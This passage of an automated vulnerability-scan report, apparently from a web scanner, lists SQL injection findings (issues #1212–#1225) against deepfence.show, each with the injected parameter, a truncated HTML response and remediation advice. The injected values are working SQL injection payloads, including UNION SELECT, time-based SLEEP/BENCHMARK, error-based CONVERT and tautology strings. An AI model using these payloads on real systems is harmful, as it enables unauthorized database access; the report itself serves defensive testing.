may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1212\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1213\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1214\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1215\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1216\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1217\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1218\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1219Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or (\"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1220\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1221\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1222\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# &&SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1223\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(\n1000000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1224\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or '' '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1225\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives 